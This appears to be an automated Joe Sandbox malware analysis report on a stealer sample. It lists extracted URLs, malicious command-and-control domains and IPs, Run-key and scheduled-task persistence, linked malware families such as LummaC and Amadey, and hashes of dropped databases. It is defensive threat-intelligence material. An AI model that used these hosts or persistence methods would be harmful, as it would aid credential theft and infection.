                                                                                                                                                                                      https://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 00000030.00000002.3666518929.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3345779688.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://contile.services.mozilla.com/v1/tilesfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                          https://monitor.firefox.com/user/preferencesfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                            https://screenshots.firefox.com/firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://firefox-source-docs.mozilla.org/remote/Security.htmlfirefox.exe, 00000030.00000002.3537155261.000002238A726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://smartblock.firefox.etp/play.svgresource://gre/modules/FileUtils.sys.mjsFileUtils_openAtomicFfirefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-reportfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      https://pancakedipyps.click/bui85746525a0.exe, 0000000B.00000003.2956641999.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://pancakedipyps.click/bu885746525a0.exe, 0000000B.00000003.2956641999.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://webextensions.settings.services.mozilla.com/v1firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://iplogger.org/1Pz8p7c9692f9101.exe, 00000014.00000003.3634688996.000000000595F000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3638199431.0000000005671000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3635238092.000000000595F000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3638728492.0000000005612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integrationfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://addons.mozilla.org/%LOCALE%/firefox/firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://steamcommunity.com/profiles/7656119980936351281d22383f9.exe, 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002470000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000000.2804284012.0000000000423000.00000008.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                                            http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerfirefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://developers.google.com/safe-browsing/v4/advisoryfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://poczta.interia.pl/mh/?mailto=%sfirefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000017.00000003.2851825660.0000019CC52A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://mail.yahoo.co.jp/compose/?To=%snewChannelfirefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        https://smartblock.firefox.etp/play.svgfirefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-prfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://pancakedipyps.click/85746525a0.exe, 0000000B.00000002.3077006411.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000002.3122907184.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3021666980.0000000000BD9000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2997560050.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3021767203.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2997644464.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2637084246.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000002.3079389496.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsfirefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://curl.se/docs/hsts.html932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  https://discokeyus.lat/apiation_ed7d415177.exe, 0000001E.00000003.3635731415.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3450907146.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3487975673.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3450280730.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3590733127.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3482305250.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3419016658.0000000005ED1000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3507390509.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3536597661.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3452391310.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3621884042.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3449781945.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3406193930.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3403952992.0000000005ECA000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3501351249.0000000005ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.2638900378.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2690416299.0000000004F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      https://e.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 00000030.00000002.3666518929.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3345779688.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        https://firefox-api-proxy.cdn.mozilla.net/firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.htmlfirefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                            185.215.113.43
                                                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                            185.121.15.192
                                                                                                                                                                                                                                                            home.twentytk20ht.topSpain
                                                                                                                                                                                                                                                            207046REDSERVICIOEStrue
                                                                                                                                                                                                                                                            149.154.167.99
                                                                                                                                                                                                                                                            t.meUnited Kingdom
                                                                                                                                                                                                                                                            62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                            142.250.181.132
                                                                                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                                            34.226.108.155
                                                                                                                                                                                                                                                            httpbin.orgUnited States
                                                                                                                                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                            172.67.209.202
                                                                                                                                                                                                                                                            pancakedipyps.clickUnited States
                                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                            185.156.73.23
                                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                                            48817RELDAS-NETRUfalse
                                                                                                                                                                                                                                                            185.199.110.133
                                                                                                                                                                                                                                                            raw.githubusercontent.comNetherlands
                                                                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                                                                            31.41.244.11
                                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                                            61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                                                            104.21.21.99
                                                                                                                                                                                                                                                            discokeyus.latUnited States
                                                                                                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                            185.215.113.16
                                                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                            20.233.83.145
                                                                                                                                                                                                                                                            github.comUnited States
                                                                                                                                                                                                                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                                                                                            185.215.113.206
                                                                                                                                                                                                                                                            unknownPortugal
                                                                                                                                                                                                                                                            206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                            94.130.188.57
                                                                                                                                                                                                                                                            toptek.sbsGermany
                                                                                                                                                                                                                                                            24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                            104.21.67.146
                                                                                                                                                                                                                                                            cheapptaxysu.clickUnited States
                                                                                                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                            Analysis ID:1579352
                                                                                                                                                                                                                                                            Start date and time:2024-12-21 22:14:04 +01:00
                                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                            Overall analysis duration:0h 17m 9s
                                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                            Number of analysed new started processes analysed:61
                                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                                            Sample name:file.exe
                                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@142/126@28/17
                                                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                                                            • Successful, ratio: 80%
                                                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 184.30.21.144, 92.122.16.236, 23.218.208.109, 172.217.21.35, 172.217.19.206, 64.233.162.84, 172.217.17.46, 142.250.181.3, 64.233.164.84, 20.109.210.53, 13.107.246.63, 23.218.209.198, 184.30.21.171, 20.190.177.148, 92.122.17.193, 13.87.96.169, 172.165.61.93, 142.250.181.99, 172.217.17.78, 20.189.173.21, 13.89.179.11, 172.217.19.170, 20.189.173.22
                                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, data-edge.smartscreen.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, clientservices.googleapis.com, nav.smartscreen.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e12564.dspb.akamaiedge.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, e16604.g.akamaiedge.net, drive.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, drive.usercontent.google.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, store-images.s-microsoft.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.microsoft.com, livetileedge.dsx.mp.microsoft.com
                                                                                                                                                                                                                                                            • Execution Graph export aborted for target 85746525a0.exe, PID 7908 because there are no executed function
                                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtDeleteValueKey calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                                            16:16:01API Interceptor155695x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                            16:16:26API Interceptor7x Sleep call for process: 85746525a0.exe modified
                                                                                                                                                                                                                                                            16:16:29API Interceptor32x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                            16:16:41API Interceptor59x Sleep call for process: 81d22383f9.exe modified
                                                                                                                                                                                                                                                            16:16:53API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                            16:17:05API Interceptor32385x Sleep call for process: ed7d415177.exe modified
                                                                                                                                                                                                                                                            16:17:12API Interceptor90497x Sleep call for process: 932bb971c3.exe modified
                                                                                                                                                                                                                                                            16:17:20API Interceptor48415x Sleep call for process: c9692f9101.exe modified
                                                                                                                                                                                                                                                            16:17:31API Interceptor1377x Sleep call for process: d0e32932f8.exe modified
                                                                                                                                                                                                                                                            16:17:58API Interceptor39x Sleep call for process: 74b92d58dc.exe modified
                                                                                                                                                                                                                                                            21:14:58Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            21:17:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ed7d415177.exe C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            21:17:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d0e32932f8.exe C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            21:17:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bc893816fa.exe C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe
                                                                                                                                                                                                                                                            21:17:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 6f3b41816f.exe C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe
                                                                                                                                                                                                                                                            21:17:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ed7d415177.exe C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            21:17:55Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                            21:17:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d0e32932f8.exe C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            21:17:58Task SchedulerRun new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                            21:18:03Task SchedulerRun new task: MyBootTask path: C:\Users\user\AppData\Local\Temp\1019677001\fbaaecbd82.exe
                                                                                                                                                                                                                                                            21:18:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bc893816fa.exe C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe
                                                                                                                                                                                                                                                            21:18:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 6f3b41816f.exe C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe
                                                                                                                                                                                                                                                            21:18:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                            21:18:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            pancakedipyps.clickfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                            • 104.21.23.76
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                                                                                                                                                                            • 104.21.23.76
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                                                            • 104.21.23.76
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                                                            • 172.67.209.202
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                            • 104.21.23.76
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                                                            • 172.67.209.202
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            • 104.21.23.76
                                                                                                                                                                                                                                                            AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            • 172.67.209.202
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                                                            • 172.67.209.202
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                                                                                                                                                                            • 104.21.23.76
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
